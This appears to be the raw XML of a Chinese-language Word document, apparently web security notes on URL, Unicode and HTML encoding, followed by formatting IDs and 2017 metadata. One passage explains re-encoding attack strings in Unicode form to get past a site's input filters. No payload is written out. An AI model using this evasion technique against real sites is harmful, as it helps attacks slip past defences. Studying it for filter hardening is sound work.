    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars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encodeURIComponent（71个）：!'()*-._~0-9a-zA-Z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ind w:firstLine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default"/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</w:rPr>
        <w:t> unicode编码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Unicode有1114112个码位，也就是说可以分配1114112个字符。Unicode编码的字符以%u为前缀，后面是这个字符的十六进制unicode的码点。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>如%u+utf8(16进制)。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Unicode编码之所以被本文提到，因为有的站点过滤了某些字符串的话，但是发现这个站点在后端验证字符串的时候，识别unicode编码，那我们就可以把我</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>们的攻击代码来改成unicode编码形式，就可以绕过站点的过滤机制了。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default"/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</w:rPr>
        <w:t>HTML编码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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5268595" cy="3668395"/>
            <wp:effectExtent l="0" t="0" r="8255" b="825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Standard Symbols P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enlo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DejaVu Math TeX Gyre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verdan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F1F39"/>
    <w:rsid w:val="058704F2"/>
    <w:rsid w:val="175D20D3"/>
    <w:rsid w:val="1BD9AED2"/>
    <w:rsid w:val="1D9D6CC6"/>
    <w:rsid w:val="274F176A"/>
    <w:rsid w:val="27B5B822"/>
    <w:rsid w:val="2EFC4E34"/>
    <w:rsid w:val="313F1F39"/>
    <w:rsid w:val="37D77A76"/>
    <w:rsid w:val="3AFF693A"/>
    <w:rsid w:val="3BD77DA1"/>
    <w:rsid w:val="3DDAB28E"/>
    <w:rsid w:val="3E0E6DEE"/>
    <w:rsid w:val="43FE50E4"/>
    <w:rsid w:val="4F5F6FDE"/>
    <w:rsid w:val="4FEFB3C5"/>
    <w:rsid w:val="507C14D7"/>
    <w:rsid w:val="533EB98E"/>
    <w:rsid w:val="543D75FF"/>
    <w:rsid w:val="546F4CC7"/>
    <w:rsid w:val="5B6F49A6"/>
    <w:rsid w:val="5BD76C2B"/>
    <w:rsid w:val="5DC6C709"/>
    <w:rsid w:val="5E66D3C3"/>
    <w:rsid w:val="5EF58D8D"/>
    <w:rsid w:val="611D6AB8"/>
    <w:rsid w:val="63AA5472"/>
    <w:rsid w:val="63EB46C1"/>
    <w:rsid w:val="69AFC8E6"/>
    <w:rsid w:val="6DBBCBDC"/>
    <w:rsid w:val="6DFFC427"/>
    <w:rsid w:val="6F779B95"/>
    <w:rsid w:val="6FB36B48"/>
    <w:rsid w:val="6FF2CC11"/>
    <w:rsid w:val="72E8EE26"/>
    <w:rsid w:val="737A09F1"/>
    <w:rsid w:val="75EF26D8"/>
    <w:rsid w:val="773DDA36"/>
    <w:rsid w:val="779BBFD6"/>
    <w:rsid w:val="783A14C7"/>
    <w:rsid w:val="7A9F40B2"/>
    <w:rsid w:val="7ACFE4B5"/>
    <w:rsid w:val="7B7A8D94"/>
    <w:rsid w:val="7BFF3A96"/>
    <w:rsid w:val="7C5F0EFB"/>
    <w:rsid w:val="7DB29C7F"/>
    <w:rsid w:val="7DBB4822"/>
    <w:rsid w:val="7E636B82"/>
    <w:rsid w:val="7E6FA92C"/>
    <w:rsid w:val="7E7F15D8"/>
    <w:rsid w:val="7F5BFE72"/>
    <w:rsid w:val="7F670AED"/>
    <w:rsid w:val="7FBF022A"/>
    <w:rsid w:val="7FCD0361"/>
    <w:rsid w:val="7FD9F0A8"/>
    <w:rsid w:val="7FE7888B"/>
    <w:rsid w:val="7FFB728D"/>
    <w:rsid w:val="8EFBE63F"/>
    <w:rsid w:val="97BD099A"/>
    <w:rsid w:val="9EAF81D0"/>
    <w:rsid w:val="9F4F21BE"/>
    <w:rsid w:val="9F776498"/>
    <w:rsid w:val="9FFCD65C"/>
    <w:rsid w:val="AA2FEC1E"/>
    <w:rsid w:val="BBBBB474"/>
    <w:rsid w:val="BCD77EF9"/>
    <w:rsid w:val="BEFFE501"/>
    <w:rsid w:val="C5FEAF72"/>
    <w:rsid w:val="D3FD7E6E"/>
    <w:rsid w:val="DAE6BC09"/>
    <w:rsid w:val="DB8FABA5"/>
    <w:rsid w:val="DFB747CA"/>
    <w:rsid w:val="DFDD0EB9"/>
    <w:rsid w:val="DFFAB575"/>
    <w:rsid w:val="E6F60FF2"/>
    <w:rsid w:val="E9F126FA"/>
    <w:rsid w:val="EFFF69AB"/>
    <w:rsid w:val="EFFF6A31"/>
    <w:rsid w:val="F6B71D22"/>
    <w:rsid w:val="F7BDF73D"/>
    <w:rsid w:val="F9AC00A1"/>
    <w:rsid w:val="F9EB33B7"/>
    <w:rsid w:val="FB1DFE1E"/>
    <w:rsid w:val="FB9FA3E4"/>
    <w:rsid w:val="FBDF0F41"/>
    <w:rsid w:val="FD7F09A4"/>
    <w:rsid w:val="FDBB6B29"/>
    <w:rsid w:val="FDFA2358"/>
    <w:rsid w:val="FEF79178"/>
    <w:rsid w:val="FEFDB1F9"/>
    <w:rsid w:val="FF7F9B0A"/>
    <w:rsid w:val="FFABD5DF"/>
    <w:rsid w:val="FFBCE48F"/>
    <w:rsid w:val="FFBEDA90"/>
    <w:rsid w:val="FFD33306"/>
    <w:rsid w:val="FFF56433"/>
    <w:rsid w:val="FFF70B77"/>
    <w:rsid w:val="FFFE4197"/>
    <w:rsid w:val="FFFF9047"/>
    <w:rsid w:val="FFFF97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2017-04-08T02:49:00Z</dcterms:created>
  <dc:creator>wu</dc:creator>
  <cp:lastModifiedBy>wu</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-07-04T10:15:27Z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